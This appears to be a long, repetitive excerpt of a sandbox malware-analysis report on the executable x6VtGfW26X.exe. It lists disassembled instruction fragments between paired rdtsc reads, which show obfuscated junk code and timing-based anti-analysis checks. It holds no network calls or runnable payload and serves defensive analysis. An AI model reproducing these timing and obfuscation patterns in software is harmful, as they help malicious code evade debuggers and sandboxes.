            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7C9D second address: 9C7CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1E54D81Ch 0x00000010 or dword ptr [ebp+122D1979h], ecx 0x00000016 push B0D35803h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FA6C4CAD506h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C88BE second address: 9C88C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C8E75 second address: 9C8E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C943F second address: 9C9445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9445 second address: 9C9459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jng 00007FA6C4CAD506h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9459 second address: 9C945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D53 second address: 9C9D5D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D5D second address: 9C9D85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA6C4EBA086h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007FA6C4EBA076h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF3D second address: 9CAF47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF47 second address: 9CAF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D85 second address: 9C9D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C9D8A second address: 9C9D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4EBA07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CAF4B second address: 9CAF82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, di 0x0000000d push 00000000h 0x0000000f or esi, 76D69985h 0x00000015 push 00000000h 0x00000017 jmp 00007FA6C4CAD519h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 push edx 0x00000021 pop edx 0x00000022 pop esi 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CBA7D second address: 9CBAC7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4EBA07Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov bh, B4h 0x00000010 xor bx, BD54h 0x00000015 popad 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+124652BFh], ebx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D1B6Ch], esi 0x00000026 xchg eax, ebx 0x00000027 jg 00007FA6C4EBA07Eh 0x0000002d push eax 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6C4EBA07Bh 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CBAC7 second address: 9CBACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CDBB2 second address: 9CDC15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA6C4EBA078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007FA6C4EBA085h 0x00000027 pop esi 0x00000028 push 00000000h 0x0000002a mov di, bx 0x0000002d push 00000000h 0x0000002f jmp 00007FA6C4EBA07Dh 0x00000034 xchg eax, ebx 0x00000035 push ebx 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 pop edx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0675 second address: 9D0681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE42B second address: 9CE42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0852 second address: 9D0858 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE42F second address: 9CE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D0858 second address: 9D08F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4CAD516h 0x00000010 pop edx 0x00000011 nop 0x00000012 movzx edi, si 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or bx, F040h 0x00000021 mov dword ptr [ebp+122D24DEh], ecx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FA6C4CAD508h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov ebx, ecx 0x0000004a mov eax, dword ptr [ebp+122D1071h] 0x00000050 jp 00007FA6C4CAD521h 0x00000056 push FFFFFFFFh 0x00000058 mov bx, 9E5Ah 0x0000005c nop 0x0000005d push ebx 0x0000005e pushad 0x0000005f push edi 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE435 second address: 9CE45A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4EBA08Bh 0x00000008 jmp 00007FA6C4EBA085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18C3 second address: 9D18D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FA6C4CAD50Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9CE45A second address: 9CE468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FA6C4EBA076h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18D0 second address: 9D18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4CAD513h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D2829 second address: 9D28D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b xor dword ptr [ebp+122D3596h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007FA6C4EBA080h 0x0000001d add dword ptr [ebp+12486736h], esi 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FA6C4EBA078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D0289h] 0x0000004a xor bh, FFFFFFD5h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FA6C4EBA078h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 nop 0x0000006a push ecx 0x0000006b ja 00007FA6C4EBA07Ch 0x00000071 pop ecx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnl 00007FA6C4EBA078h 0x0000007b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18EB second address: 9D18F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FA6C4CAD506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D387A second address: 9D389F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA6C4EBA087h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D45A2 second address: 9D45A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D389F second address: 9D38A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D38A6 second address: 9D38AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D47F2 second address: 9D47F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D5706 second address: 9D570A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D570A second address: 9D570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D570E second address: 9D5714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D5714 second address: 9D578D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jne 00007FA6C4EBA078h 0x00000011 pop esi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FA6C4EBA078h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1BCAh], edi 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov ebx, eax 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 movzx edi, dx 0x00000046 mov eax, dword ptr [ebp+122D09CDh] 0x0000004c movsx edi, di 0x0000004f mov bx, si 0x00000052 push FFFFFFFFh 0x00000054 sub dword ptr [ebp+124652BFh], eax 0x0000005a nop 0x0000005b jmp 00007FA6C4EBA07Ah 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D776C second address: 9D7770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D7770 second address: 9D777B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D777B second address: 9D77F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FA6C4CAD508h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+122D1943h] 0x00000027 push 00000000h 0x00000029 jmp 00007FA6C4CAD516h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA6C4CAD508h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FA6C4CAD516h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D8794 second address: 9D879A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D879A second address: 9D87E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007FA6C4CAD51Ch 0x00000011 jmp 00007FA6C4CAD516h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA6C4CAD50Eh 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D9721 second address: 9D97A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA6C4EBA081h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FA6C4EBA078h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 xor ebx, 6BD9FDC7h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D1C0Eh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FA6C4EBA078h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D380Bh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b js 00007FA6C4EBA078h 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D97A2 second address: 9D97AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB680 second address: 9DB6EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, 2A6B7854h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA6C4EBA078h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FA6C4EBA078h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 xor ebx, dword ptr [ebp+122D3757h] 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jmp 00007FA6C4EBA07Dh 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB6EE second address: 9DB715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD512h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4CAD50Bh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB895 second address: 9DB899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB899 second address: 9DB89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DC936 second address: 9DC93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DC93B second address: 9DC940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DF570 second address: 9DF574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DF574 second address: 9DF58B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E4757 second address: 9E475B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E475B second address: 9E475F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E475F second address: 9E4765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E4765 second address: 9E476A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 987167 second address: 987177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 ja 00007FA6C4EBA076h 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 987177 second address: 98719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4CAD519h 0x0000000c jc 00007FA6C4CAD506h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E855A second address: 9E856F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4EBA07Bh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E856F second address: 9E8591 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 jmp 00007FA6C4CAD50Dh 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8591 second address: 9E859D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FA6C4EBA076h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E859D second address: 9E85A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E871C second address: 9E8726 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8726 second address: 9E8738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD50Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8738 second address: 9E873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E873C second address: 9E8742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 982307 second address: 98230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 98230D second address: 982325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6C4CAD50Dh 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 982325 second address: 98232F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7397 second address: 9C739B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28282 second address: A28286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28286 second address: A2828E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2828E second address: A28294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28294 second address: A282DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FA6C4CAD519h 0x0000000f jo 00007FA6C4CAD506h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA6C4CAD512h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA6C4CAD50Ah 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282DE second address: A282E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
